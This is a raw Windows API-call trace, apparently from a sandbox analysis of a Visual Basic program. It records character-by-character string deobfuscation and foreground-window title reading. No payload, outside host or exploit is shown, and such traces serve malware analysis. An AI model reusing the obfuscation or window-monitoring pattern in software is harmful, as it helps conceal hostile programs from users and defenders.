cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.378] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.379] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.379] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.379] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.380] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0176.380] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.381] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.381] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.382] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0176.382] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.383] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.383] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.384] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.384] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.384] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.385] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.385] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.386] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.386] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.386] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.387] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.387] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.388] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.388] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.389] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.538] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.539] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.539] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.540] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.540] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.541] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.541] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.542] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.543] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.544] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.544] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.545] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.545] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.545] GetForegroundWindow () returned 0x10162 [0176.660] GetLastError () returned 0x0 [0176.660] SysStringLen (param_1=" ") returned 0xff [0176.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.660] SysStringLen (param_1=" ") returned 0xff [0176.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.660] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.661] GetLastError () returned 0x0 [0176.661] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.661] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0176.662] SysStringLen (param_1="Blan") returned 0x4 [0176.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blan", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blan", lpUsedDefaultChar=0x0) returned 5 [0176.662] SetWindowTextA (hWnd=0x103c4, lpString="Blan") returned 1 [0176.662] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0176.662] GetFocus () returned 0x0 [0176.662] lstrlenA (lpString="Blan") returned 4 [0176.662] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0176.663] IsWindow (hWnd=0x103c4) returned 1 [0176.663] IsWindow (hWnd=0x103c4) returned 1 [0176.664] IsWindow (hWnd=0x103c4) returned 1 [0176.664] IsWindow (hWnd=0x103c4) returned 1 [0176.664] GetFocus () returned 0x0 [0176.665] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0176.665] GetFocus () returned 0x0 [0176.665] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0176.665] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0176.665] GetFocus () returned 0x0 [0176.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0176.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Blan") returned 5 [0176.665] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.665] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.667] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0176.667] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.668] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0176.668] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.669] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.669] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.670] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.694] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.695] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.695] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.696] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.696] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.697] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0176.697] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.698] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.698] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.699] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0176.699] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.700] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.700] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.701] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.701] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.707] VarSub (in: 